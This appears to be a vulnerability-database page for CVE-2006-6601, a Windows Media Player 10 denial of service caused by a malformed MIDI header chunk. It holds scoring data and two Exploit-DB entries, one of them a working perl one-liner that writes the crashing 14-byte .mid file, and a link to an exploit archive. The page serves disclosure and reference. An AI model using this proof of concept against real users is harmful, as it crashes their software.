CVE-2006-6601
published 2006-12-15CVE-2006-6601: Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
17.14%
96.7th percentile
Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks of (2) time division fields that are set to 0.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| windows | media_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Media Player 9/10 - '.mid' Denial of Service
exploitdb·2006-12-15
CVE-2006-6601 Microsoft Windows Media Player 9/10 - '.mid' Denial of Service
Microsoft Windows Media Player 9/10 - '.mid' Denial of Service
---
#!/bin/sh
# Windows Media MID File Denial Of Service Vulnerability
# Tested:
# Windows Media 10.00.00.4036
# Windows XP SP2
# file "example.mid" (Hex-Code):
# 4D 54 68 64 00 00 00 06 00 00 00 00 00 00
# File size = 14 byte
perl -e 'print "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"' > example.mid
# milw0rm.com [2006-12-15]
Exploit-DB
Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service
exploitdb·2006-12-15
CVE-2006-6601 Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service
Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service
---
source: https://www.securityfocus.com/bid/21612/info
Multiple applications are prone to a denial-of-service vulnerability.
A remote attacker may exploit this vulnerability by presenting malicious 'WMV', 'MID', and 'AVI' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service.
It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29285.zip
http://www.attrition.org/pipermail/vim/2006-December/001182.htmlhttp://www.securityfocus.com/archive/1/454505/100/0/threadedhttp://www.securityfocus.com/bid/21612http://www.vupen.com/english/advisories/2006/5039http://www.attrition.org/pipermail/vim/2006-December/001182.htmlhttp://www.securityfocus.com/archive/1/454505/100/0/threadedhttp://www.securityfocus.com/bid/21612http://www.vupen.com/english/advisories/2006/5039
2006-12-15
Published